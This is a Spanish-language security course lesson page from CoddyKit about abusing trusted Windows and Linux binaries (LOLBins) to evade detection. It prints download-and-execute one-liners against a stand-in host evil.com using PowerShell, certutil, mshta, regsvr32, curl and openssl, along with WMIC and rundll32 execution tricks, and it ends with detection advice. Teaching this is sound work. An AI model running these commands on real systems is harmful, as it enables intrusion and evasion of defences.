0Pricing
Cyber Security Academy · Lección

Binarios Living-Off-the-Land (LOLBins)

Utilice binarios confiables de Windows (certutil, mshta, regsvr32) para evadir la detección.

Binarios Living-Off-the-Land (LOLBins) es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.

¿Qué son los LOLBins?

Los binarios Living-Off-the-Land (LOLBins) son binarios y herramientas legítimos del sistema operativo que los atacantes reutilizan para realizar acciones maliciosas. Como son herramientas del sistema confiables y firmadas, a menudo evitan las listas blancas de aplicaciones y reducen la detección por parte de AV/EDR.

Por qué son eficaces los LOLBins

Ventajas para los atacantes:

  • Siempre están presentes en los sistemas objetivo; no es necesario descargar archivos nuevos
  • Están firmados por Microsoft/Apple; evitan la detección basada en firmas
  • Las soluciones de listas blancas de aplicaciones confían en ellos
  • Generan árboles de procesos con apariencia legítima

PowerShell como LOLBin

PowerShell es el LOLBin más utilizado de forma indebida. Los atacantes lo usan para:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe es una herramienta de certificados de Windows que puede descargar archivos:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta y wscript

Ejecución de scripts mediante hosts confiables:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe puede cargar y ejecutar DLL desde URL remotas mediante las opciones /s /n /u /i; de este modo evita AppLocker y ejecuta código sin firmar como un proceso confiable:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

WMIC y ejecución mediante WMI

Windows Management Instrumentation ejecuta código de forma remota y local:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe carga y ejecuta puntos de entrada de DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins de Linux

Equivalentes en Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS y GTFOBins

Bases de datos de referencia:

  • LOLBAS (lolbas-project.github.io): binarios, scripts y bibliotecas de Windows
  • GTFOBins (gtfobins.github.io): binarios de Linux/macOS para explotación, lectura/escritura de archivos y escalada mediante SUID

Detección del uso indebido de LOLBins

Estrategias de detección:

  • Registro de bloques de scripts de PowerShell (EventID 4104): registra los comandos decodificados
  • Sysmon EventID 1: creación de procesos con la cadena de procesos padre
  • Genere alertas ante relaciones padre-hijo inesperadas: Word → PowerShell, Excel → cmd
  • Conexiones de red desde certutil, mshta y powershell
  • Líneas base de UEBA para señalar el uso anómalo de binarios

Comprobación rápida: LOLBins

¿Qué binario de Windows puede descargar un archivo remoto mediante la opción -urlcache?

Resumen de la lección

Los LOLBins son herramientas legítimas del sistema operativo reutilizadas con fines maliciosos: PowerShell, certutil, mshta, regsvr32, rundll32 y WMIC en Windows; curl, python y openssl en Linux. Evitan la detección basada en firmas y las listas blancas de aplicaciones. Su detección requiere registros de creación de procesos (Sysmon), registro de bloques de scripts de PowerShell y líneas base de comportamiento. LOLBAS y GTFOBins son bases de datos de referencia esenciales.

Preguntas frecuentes

¿La lección «Binarios Living-Off-the-Land (LOLBins)» es gratis?

Sí — el texto completo de «Binarios Living-Off-the-Land (LOLBins)» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Binarios Living-Off-the-Land (LOLBins)»?

Utilice binarios confiables de Windows (certutil, mshta, regsvr32) para evadir la detección. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Cyber Security Academy?

No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.

¿Cuánto tiempo toma la lección «Binarios Living-Off-the-Land (LOLBins)»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?

Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Frameworks de C2: Cobalt Strike y Sliver
  2. Binarios Living-Off-the-Land (LOLBins)
  3. Técnicas de movimiento lateral
  4. Redacción de informes de Red Team
← Volver a Cyber Security Academy